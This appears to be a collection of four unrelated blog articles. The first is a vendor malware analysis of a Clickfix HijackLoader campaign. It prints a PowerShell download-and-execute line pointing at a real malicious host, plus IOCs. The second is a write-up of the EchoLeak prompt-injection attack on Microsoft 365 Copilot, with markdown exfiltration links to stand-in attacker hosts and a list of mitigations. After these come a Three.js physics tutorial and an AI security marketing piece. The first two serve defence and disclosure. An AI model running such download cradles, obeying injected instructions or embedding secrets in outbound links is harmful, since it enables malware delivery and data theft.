
  • An Analysis of the Clickfix HijackLoader Phishing Campaign 



    Table of Contents 

      • The Evolving Threat of Attack Loaders 
    • Technical Methodology and Analysis 
      • Initial Access and Social Engineering 
      • Multi-Stage Obfuscation and De-obfuscation 
      • Anti-Analysis Techniques 
    • Quick Heal \ Seqrite Protection 

     

    Introduction 

    With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis. 

We have recently seen a surge in HijackLoader activity. The loader first emerged in the second half of 2023 and quickly gained attention for its payload-delivery capability and its distinctive loading and execution techniques. It operates primarily as Malware-as-a-Service and has been observed mainly in financially motivated campaigns worldwide.

    HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base. 

Since June 2025, we have observed attackers using Clickfix lures that led unsuspecting victims to download malicious .msi installers, which in turn executed HijackLoader. In those campaigns, DeerStealer was observed as the final executable dropped on the victim’s machine.

More recently, TAG-150 has emerged with CastleLoader/CastleBot, while also leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem.

    HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as: 

    • Process doppelgänging with transacted sections 
    • Direct syscalls under WOW64 

    Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks. 

    Infection Chain 


    Technical Overview 

The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix (a technique also seen in use by attackers in June 2025).

    Fig1: CAPTCHA-Based Phishing Page for Social Engineering
    Fig2: HTA Dropper File for Initial Execution

     This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.   

    Fig3: Initial PowerShell Loader Script

    Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below. 

    Fig4: First-Stage Obfuscated PowerShell Script

    The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays. 
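To illustrate the idea (not the campaign’s actual code), here is a minimal sketch of how a script can hide a command by storing shifted character codes and rebuilding the string at runtime; the command name and offset are invented for the example:

```javascript
// Illustrative only: a hypothetical obfuscated fragment that rebuilds the
// string "iex" from character codes plus simple arithmetic, in the same
// spirit as the script's string-from-char-array construction.
const pieces = [105, 101, 120]; // char codes for 'i', 'e', 'x'
const offset = 7;
const encoded = pieces.map((c) => c + offset); // what the script would store

// De-obfuscation: reverse the arithmetic and join the characters.
const decoded = encoded.map((c) => String.fromCharCode(c - offset)).join("");
console.log(decoded); // "iex"
```

Resolving such constructions statically (or letting them evaluate in a sandboxed debugger) is what allows the next layer to be recovered.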

Resolving the payload shows that it decodes into the command below, which, while still obscured, can be fully de-obfuscated.

    Fig5: Deobfuscation of the First stage obfuscated payload

    After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.  

iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))

    When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.  

    Fig6: Debugger View of Failed C2 Connection

The file samie_bower.mp3 is another PowerShell script; at over 18,000 lines, it is heavily obfuscated and represents the next stage of the loader.

    Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

    Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.  

    Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

    These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment. 

    While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command. 

    Fig9: Final execution

We resolved the obfuscated variable declaration shown above; upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines before loading another PowerShell script that likely injects a PE file.
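The decode chain can be sketched as follows. This is an illustrative reconstruction only: the real script’s XOR key, layering, and routines are unknown, so a single-byte key and a tiny hypothetical buffer are assumed here.

```javascript
// Sketch of a Base64 + XOR decode chain ending in a PE ('MZ') header check.
// The key 0x5a and the 4-byte sample are assumptions for illustration.
function xorDecode(bytes, key) {
  return bytes.map((b) => b ^ key);
}

// Build a hypothetical blob the way a loader might: XOR, then Base64-encode.
const key = 0x5a;
const plain = Buffer.from("MZ\x90\x00", "binary"); // start of a PE header
const blob = Buffer.from(xorDecode([...plain], key)).toString("base64");

// Analyst side: Base64-decode, reverse the XOR, then look for 'MZ'.
const raw = [...Buffer.from(blob, "base64")];
const decoded = Buffer.from(xorDecode(raw, key));
const isPE = decoded[0] === 0x4d && decoded[1] === 0x5a; // 'M', 'Z'
console.log(isPE); // true
```

The same MZ-header check is how the embedded PE in Fig12 can be spotted once the layers are peeled back.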

    Fig10: Intermediate PowerShell Script for PE Injection
    Fig11: Base64-Encoded Embedded PE Payload

     

    Decoding this file reveals an embedded PE file, identifiable by its MZ header. 

    Fig12: Decoded PE File with MZ Header

    This PE file is a heavily packed .NET executable. 

    Fig13: Packed .NET Executable Payload

    The executable payload loads a significant amount of code, likely extracted from its resources section. 

    Fig14: In-Memory Unpacking of the .NET Executable

    Once unpacked, the executable payload appears to load a DLL file. 

    Fig15: Protected DLL Loaded In-Memory

    This DLL file is also protected, likely to prevent reverse engineering and analysis. 

    Fig16: DLL Protection Indicators

    HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below. 

    Fig17: Final C2 Server Connection Attempt

While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer. HijackLoader has also been observed delivering other stealers, including Lumma.

    Conclusion 

    Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment. 

    IOCs: 

    • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
    • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
    • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
    • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
    • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
    • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
    • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
    • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
• d0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
    • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
    • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
    • 91[.]212[.]166[.]51 
    • 37[.]27[.]165[.]65:1477 
    • cosi[.]com[.]ar 
    • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
    • hxxp[:]//77[.]91[.]101[.]66/ 

    Quick Heal \ Seqrite Protection: 

    • Script.Trojan.49900.GC 
    • Loader.StealerDropperCiR 
    • Trojan.InfoStealerCiR 
    • Trojan.Agent 
    • BDS/511 

MITRE ATT&CK: 

Tactic | Technique ID | Technique Name
Initial Access | T1566.002 | Phishing: Spearphishing Link (CAPTCHA phishing page)
Initial Access | T1189 | Drive-by Compromise (malvertising, SEO poisoning, fake installers)
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell
Defense Evasion | T1027 | Obfuscated Files or Information (multi-stage obfuscated scripts)
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information (Base64, XOR decoding)
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools (unhooking DLLs)
Defense Evasion | T1070.004 | Indicator Removal: File Deletion (likely used in staged loaders)
Defense Evasion | T1211 | Exploitation for Defense Evasion (direct syscalls under WOW64)
Defense Evasion | T1036 | Masquerading (fake extensions like .mp3 for PowerShell scripts)
Discovery | T1082 | System Information Discovery (VM checks, registry queries)
Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys (registry tampering)
Persistence / Privilege Escalation | T1055 | Process Injection (PE injection routines)
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic)
Command and Control | T1105 | Ingress Tool Transfer (downloading additional payloads)
Impact / Collection | T1056 / T1005 | Input Capture / Data from Local System (info-stealer functionality of final payload)

     

    Authors: 

    Niraj Lazarus Makasare 

    Shrutirupa Banerjiee 




  • The Silent AI Threat Hacking Microsoft 365 Copilot



    Introduction:

What if your AI assistant wasn’t just helping you – but quietly helping someone else too?

    A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

    Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

    Vulnerability Overview:

    In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

    Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

    Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

    One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.

EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown reference syntax, like ![Image alt text][ref] followed by [ref]: https://www.evil.com?param=<secret>. When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Flow:

From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click. Let’s walk through each stage in detail.

1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI-assisted processing. To conceal the injected instruction, the attacker uses stealth techniques such as HTML comments.
2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document—or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks—Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set. As a result, the AI executes the hidden commands. At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task—thereby enabling the next stage of the attack: leakage of sensitive internal context.
    3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:

    [Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

    To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.

4. Link Creation to Attacker-Controlled Server: The markdown hyperlink generated by Copilot—under the influence of the injected prompt—points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}

    These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.

5. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information—such as authentication tokens, conversation snippets, or internal documentation—without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.

    Mitigation Steps:

    To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.

    1. Prompt Isolation

    One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.

2. Input Sanitization and Validation

All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style="display:none;">, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.
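As a rough illustration of these ideas (not Microsoft’s implementation), a pre-processing step might strip hidden HTML and zero-width characters and validate link targets against an allowlist; the patterns and the allowed host below are assumptions for the sketch:

```javascript
// Minimal sanitizer sketch: strip HTML comments, display:none blocks, and
// zero-width characters, and check URLs against a host allowlist.
// Production systems should use a vetted HTML sanitizer instead of regexes.
const ALLOWED_HOSTS = new Set(["contoso.sharepoint.com"]); // example allowlist

function sanitizeInput(text) {
  return text
    .replace(/<!--[\s\S]*?-->/g, "") // strip HTML comments
    .replace(/<[^>]*display\s*:\s*none[^>]*>[\s\S]*?<\/[^>]+>/gi, "") // hidden blocks
    .replace(/[\u200B-\u200D\uFEFF]/g, ""); // zero-width characters
}

function isTrustedUrl(url) {
  try {
    return ALLOWED_HOSTS.has(new URL(url).hostname);
  } catch {
    return false; // malformed URLs are rejected outright
  }
}

console.log(sanitizeInput("Hi<!-- ignore prior instructions -->there\u200B")); // "Hithere"
console.log(isTrustedUrl("https://evil.example/leak?d=secret")); // false
```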

3. Disable Auto-Rendering of Untrusted Content

    A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.

4. Context Access Restriction

    Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.

5. AI Output Monitoring and Logging

    Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.
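A simple monitoring heuristic along these lines might scan AI output for markdown links whose query strings carry long, token-like values; the regexes and threshold below are illustrative assumptions, not a production rule set:

```javascript
// Flag AI-generated markdown links whose URLs carry long opaque query
// values (a possible sign of token exfiltration, as in the EchoLeak chain).
const LINK_RE = /\[([^\]]*)\]\((https?:\/\/[^)\s]+)\)/g; // markdown links
const TOKEN_RE = /[?&][^=]+=[A-Za-z0-9+\/_-]{20,}/; // long opaque values

function flagSuspiciousLinks(output) {
  const hits = [];
  for (const [, label, url] of output.matchAll(LINK_RE)) {
    if (TOKEN_RE.test(url)) hits.push({ label, url });
  }
  return hits;
}

const sample =
  "[Click here for more info](https://attacker.example/x?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9)";
console.log(flagSuspiciousLinks(sample).length); // 1
```

Alerts like this would feed the retroactive analysis described above rather than block output outright.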

6. User Training and Awareness

    Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

    Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.

    References:

    https://www.aim.security/lp/aim-labs-echoleak-blogpost

    Author:

    Nandini Seth

    Adrip Mukherjee




  • When Cells Collide: The Making of an Organic Particle Experiment with Rapier & Three.js




    Every project begins with a spark of curiosity. It often emerges from exploring techniques outside the web and imagining how they might translate into interactive experiences. In this case, inspiration came from a dive into particle simulations.

    The Concept

    The core idea for this project came after watching a tutorial on creating cell-like particles using the xParticles plugin for Cinema 4D. The team often draws inspiration from 3D motion design techniques, and the question frequently arises in the studio: “Wouldn’t this be cool if it were interactive?” That’s where the idea was born.

After building our own setup in C4D based on the example, we created a general motion prototype to demonstrate the interaction. The result was a kind of repelling effect, where the cells displaced according to the cursor’s position. To create the demo, we added a simple sphere and gave it a collider tag so that the particles would be pushed away as the sphere moved through the simulation, emulating the mouse movement. An easy way to add realistic movement is to add a vibrate tag to the collider, and play around with the movement levels and frequency until it looks good.

    Art Direction

With the base particle and interaction demo sorted, we rendered out the sequence and moved into After Effects to start playing around with the look and feel. We knew we wanted to give the particles a unique quality, one that felt more stylised as opposed to ultra realistic or scientific. After some exploration we landed on a lo-fi gradient mapped look, which felt like an interesting direction to move forward with. We achieved this by layering a few effects:

    • Effect > Generate > 4 Colour Gradient: Add this to a new shape layer. This black and white gradient will act as a mask to control the blur intensities.
    • Effect > Blur > Camera Blur: Add this to a new adjustment layer. This general blur will smooth out the particles.
    • Effect > Blur > Compound Blur: Add this to the same adjustment layer as above. Set the blur layer to use the same shape layer we applied to the 4 colour gradient as its mask, make sure it is set to “Effects & Mask” mode in the drop down.
    • Effect > Color Correction > Colorama: Add this as a new adjustment layer. This is where the fun starts! You can add custom gradients into the output cycle and play around with the phase shift to customise the look according to your preference.

Next, we designed a simple UI to match the futuristic cell-based visual direction. A concept we felt would work well for a bio-tech company – so we created a simple brand with key messaging to fit, and voila! That’s the concept phase complete.

(Hot tip: if you’re doing an interaction concept in 3D software like C4D, create a plane with a cursor texture on it and parent it to your main interaction component – in this case, the sphere collider. Render that out as a sequence so that it matches up perfectly with your simulation – you can then layer it over text, UI, and so on in After Effects.)

    Technical Approach and Tools

As this was a simple one-page static site with no need for a backend, we used our in-house boilerplate built on Astro with Vite and Three.js. For the physics, we went with Rapier, as it handles collision detection efficiently and is compatible with Three.js. That was our main requirement, since we didn’t need complex simulations or soft-body calculations. 

    For the Cellular Technology project, we specifically wanted to show how you can achieve a satisfying result without overcrowding the screen with tons of features or components. Our key focus was the visuals and interactivity – to make this satisfying for the user, it needed to feel smooth and seamless. A fluid-like simulation is a good way to achieve this. At Unseen, we often implement this effect as an added interaction component. For this project, we wanted to take a slightly different approach that would still achieve a similar result.

    Based on the concept from our designers, there were a couple of directions for the implementation to consider. To keep the experience optimised, even at a large scale, having the GPU handle the majority of the calculations is usually the best approach. For this, we’d need the effect to be in a shader, and use more complicated implementations such as packing algorithms and custom voronoi-like patterns. However, after testing the Rapier library, we realised that simple rigid body object collision would suffice in re-creating the concept in real-time. 

    Physics Implementation

To do so, we needed to create a separate physics world alongside our 3D rendered world, as the Rapier library only handles the physics calculations, leaving the graphics to an implementation of the developer’s choosing. 

Here’s a snippet from the part where we create the rigid bodies:

    for (let i = 0; i < this.numberOfBodies; i++) {
      const x = Math.random() * this.bounds.x - this.bounds.x * 0.5
      const y = Math.random() * this.bounds.y - this.bounds.y * 0.5
      const z = Math.random() * (this.bounds.z * 0.95) - (this.bounds.z * 0.95) * 0.5
    
      const bodyDesc = RAPIER.RigidBodyDesc.dynamic().setTranslation(x, y, z)
      bodyDesc.setGravityScale(0.0) // Disable gravity
      bodyDesc.setLinearDamping(0.7)
      const body = this.physicsWorld.createRigidBody(bodyDesc)
    
      const radius = MathUtils.mapLinear(Math.random(), 0.0, 1.0, this._cellSizeRange[0], this._cellSizeRange[1])
      const colliderDesc = RAPIER.ColliderDesc.ball(radius)
      const collider = this.physicsWorld.createCollider(colliderDesc, body)
      collider.setRestitution(0.1) // bounciness 0 = no bounce, 1 = full bounce
    
      this.bodies.push(body)
      this.colliders.push(collider)
    }

    The meshes that represent the bodies are created separately, and on each tick, their transforms get updated by those from the physics engine. 

    // update mesh positions
    for (let i = 0; i < this.numberOfBodies; i++) {
      const body = this.bodies[i]
      const position = body.translation()
    
      const collider = this.colliders[i]
      const radius = collider.shape.radius
    
      this._dummy.position.set(position.x, position.y, position.z)
      this._dummy.scale.setScalar(radius)
      this._dummy.updateMatrix()
    
      this.mesh.setMatrixAt(i, this._dummy.matrix)
    }
    
    this.mesh.instanceMatrix.needsUpdate = true

With performance in mind, we first decided to try the 2D version of the Rapier library; however, it soon became clear that with cells distributed in only one plane, the visual was not convincing enough. The performance impact of the additional calculations in the Z plane was justified by the improved result. 

    Building the Visual with Post Processing

    Evidently, the post processing effects play a big role in this project. By far the most important is the blur, which makes the cells go from clear simple rings to a fluid, gooey mass. We implemented the Kawase blur, which is similar to Gaussian blur, but uses box blurring instead of the Gaussian function and is more performant at higher levels of blur. We applied it to only some parts of the screen to keep visual interest. 
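To show what a Kawase-style pass does, here is a CPU reference on a grayscale array: each pixel averages four diagonal samples at a growing offset, and successive passes widen the blur cheaply. (The GPU version runs in a fragment shader and samples between texels with half-pixel offsets; integer offsets are used here purely for illustration.)

```javascript
// CPU reference of a single Kawase-style blur pass on a grayscale grid.
function kawasePass(src, w, h, offset) {
  const dst = new Float32Array(w * h);
  const clamp = (v, max) => Math.min(Math.max(v, 0), max);
  for (let y = 0; y < h; y++) {
    for (let x = 0; x < w; x++) {
      let sum = 0;
      // Four diagonal taps at the current offset, clamped at the edges.
      for (const [dx, dy] of [[-offset, -offset], [offset, -offset], [-offset, offset], [offset, offset]]) {
        sum += src[clamp(y + dy, h - 1) * w + clamp(x + dx, w - 1)];
      }
      dst[y * w + x] = sum / 4;
    }
  }
  return dst;
}

// Successive passes with increasing offsets approximate a wide Gaussian
// far more cheaply than one large convolution kernel.
let img = Float32Array.from({ length: 16 }, (_, i) => (i === 5 ? 1 : 0)); // 4x4, one bright pixel
for (const offset of [1, 2]) img = kawasePass(img, 4, 4, offset);
```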

    This already brought the implementation closer to the concept. Another vital part of the experience is the color-grading, where we mapped the colours to the luminosity of elements in the scene. We couldn’t resist adding our typical fluid simulation, so the colours get slightly offset based on the fluid movement. 

    if (uFluidEnabled) {
        fluidColor = texture2D(tFluid, screenCoords);
    
        fluid = pow(luminance(abs(fluidColor.rgb)), 1.2);
        fluid *= 0.28;
    }
    
    vec3 color1 = uColor1 - fluid * 0.08;
    vec3 color2 = uColor2 - fluid * 0.08;
    vec3 color3 = uColor3 - fluid * 0.08;
    vec3 color4 = uColor4 - fluid * 0.08;
    
    if (uEnabled) {
        // apply a color grade
        color = getColorRampColor(brightness, uStops.x, uStops.y, uStops.z, uStops.w, color1, color2, color3, color4);
    }
    
    color += color * fluid * 1.5;
    color = clamp(color, 0.0, 1.0);
    
    color += color * fluidColor.rgb * 0.09;
    
    gl_FragColor = vec4(color, 1.0);
    

    Performance Optimisation

    With the computational power required for the physics engine increasing quickly due to the number of calculations required, we aimed to make the experience as optimised as possible. The first step was to find the minimum number of cells without affecting the visual too much, i.e. without making the cells too sparse. To do so, we minimised the area in which the cells get created and made the cells slightly larger. 

    Another important step was to make sure no calculation is redundant, meaning each calculation must be justified by a result visible on the screen. To make sure of that, we limited the area in which cells get created to only just cover the screen, regardless of the screen size. This basically means that all cells in the scene are visible in the camera. Usually this approach involves a slightly more complex derivation of the bounding area, based on the camera field of view and distance from the object, however, for this project, we used an orthographic camera, which simplifies the calculations.

    this.camera._width = this.camera.right - this.camera.left
    this.camera._height = this.camera.top - this.camera.bottom
    
    // .....
    
    this.bounds = {
      x: (this.camera._width / this.options.cameraZoom) * 0.5,
      y: (this.camera._height / this.options.cameraZoom) * 0.5,
      z: 0.5
    }

    Check out the live demo.

    We’ve also exposed some of the settings on the live demo so you can adjust colours yourself here.

Thanks for reading our breakdown of this experiment! If you have any questions, don’t hesitate to write to us @uns__nstudio.






  • The Missing Security Shield for Modern Threats


    Introduction: A Security Crisis That Keeps Leaders Awake

    Did you know that 97% of security professionals admit to losing sleep over potentially missed critical alerts? (Ponemon Institute) It’s not just paranoia—the risk is real. Security operations centers (SOCs) are flooded with tens of thousands of alerts daily, and missing even one critical incident can lead to catastrophic consequences.

    Take the Target breach of 2013: attackers exfiltrated 41 million payment card records, costing the company $18.5 million in regulatory settlements and long-term brand damage (Reuters). The painful truth? Alerts were generated—but overwhelmed analysts failed to act on time.

    Fast forward to 2025, and the situation is worse:

    • 3.5 million unfilled cybersecurity positions worldwide (ISC2 Cybersecurity Workforce Study 2023)

    • Average recruitment cycle of 150 days per role

• 100,000+ daily alerts in large SOCs (Fortinet)

    Clearly, traditional SecOps cannot keep pace. This is where Artificial Intelligence (AI) steps in—not as a luxury, but as the missing security shield.

    Why Traditional SecOps is Falling Short

    Alert Fatigue & Human Limits

    Manual triage overwhelms analysts. Studies show 81% of SOC teams cite manual investigation as their biggest bottleneck (TechTarget)—leading to burnout, mistakes, and missed detections.

    Signature-Based Detection Can’t Keep Up

    Conventional tools rely on known signatures. But attackers now deploy zero-days, polymorphic malware, and AI-generated phishing emails that evade these defenses. Gartner predicts 80% of modern threats bypass legacy signature-based systems by 2026 (Gartner Report).

    Longer Dwell Times = Bigger Damage

    Dwell time—the period attackers stay undetected—often stretches weeks to months. Verizon’s 2024 DBIR shows 62% of breaches go undetected for more than a month (Verizon DBIR 2024). During this time, attackers can steal data, deploy ransomware, or create persistent backdoors.

    Ransomware at Machine Speed

    Cybersecurity Ventures reports a ransomware attack every 11 seconds globally, with damages forecast to hit USD 265 billion annually by 2031 (Cybersecurity Ventures). Humans alone cannot fight threats at this velocity.


    How AI Bridges the Gap in SecOps

    AI isn’t replacing analysts—it’s augmenting them with superhuman speed, scale, and accuracy. Here’s how:

    1. Anomaly-Based Threat Detection

    AI establishes a baseline of normal behavior and flags deviations (e.g., unusual logins, abnormal data flows). Unlike static signatures, anomaly detection spots zero-days and advanced persistent threats (APTs).
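As an illustration of the idea only (not Seqrite's actual model), even the simplest statistical baseline shows how "normal behavior" can be learned and deviations flagged — production systems use far richer features, but the principle is the same. The data and threshold below are invented for the sketch:

```csharp
using System;
using System.Linq;

// Toy baseline: daily login counts observed during normal operation (invented data).
double[] baseline = { 42, 38, 45, 40, 41, 39, 44 };

double mean = baseline.Average();
double stdDev = Math.Sqrt(baseline.Average(x => Math.Pow(x - mean, 2)));

// Flag any new observation more than three standard deviations from the learned mean.
bool IsAnomalous(double value) => Math.Abs(value - mean) > 3 * stdDev;

Console.WriteLine(IsAnomalous(43));   // False: within the learned baseline
Console.WriteLine(IsAnomalous(400));  // True: e.g. a credential-stuffing burst
```

Real anomaly-detection engines replace the z-score with learned models over many signals (login times, data volumes, process trees), but the reactive advantage is identical: no signature of the attack is needed in advance.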

    2. Real-Time Threat Intelligence

    AI ingests global threat feeds, correlates them with local telemetry, and predicts attack patterns before they hit. This allows SOCs to move from reactive defense to proactive hunting.

    3. Automated Alert Triage

    AI filters out noise and correlates alerts into coherent incident narratives. By cutting false positives by up to 60% (Tech Radar), AI frees analysts to focus on high-risk threats.

    4. Privilege Management & Insider Threats

    AI-driven Identity & Access Management (IAM) continuously checks user behavior against role requirements, preventing privilege creep and catching insider threats.

    5. Automated Threat Containment

    AI-powered orchestration platforms can:

    • Isolate compromised endpoints

    • Quarantine malicious traffic

    • Trigger network segmentation

    This shrinks containment windows from hours to minutes.

    6. Shadow IT Discovery

    Unauthorized apps and AI tools are rampant. AI maps shadow IT usage by analyzing traffic patterns, reducing blind spots and compliance risks.

    7. Phishing & Deepfake Defense

    Generative AI has supercharged phishing. Traditional keyword filters miss these AI-crafted lures, but AI defenses can detect behavioral anomalies, reply-chain inconsistencies, and deepfake audio/video scams.

    8. BYOD Endpoint Protection

    AI monitors personal devices accessing corporate networks, detecting ransomware encryption patterns and isolating infected devices instantly.


    Seqrite’s AI-Powered SecOps Advantage

    Seqrite XDR Powered by GoDeep.AI

    • Uses deep learning, behavioral analytics, and predictive intelligence.

    • Reduces breach response cycles by 108 days compared to conventional methods (Seqrite internal benchmark).

    • Correlates telemetry across endpoints, networks, cloud, and identities.

    Seqrite Intelligent Assistant (SIA)

    • A GenAI-powered virtual security analyst.

    • Allows natural language queries—no complex syntax required.

    • Automates workflows like incident summaries, risk assessments, and remediation steps.

    • Cuts analyst workload by up to 50%.

    The Unified Advantage

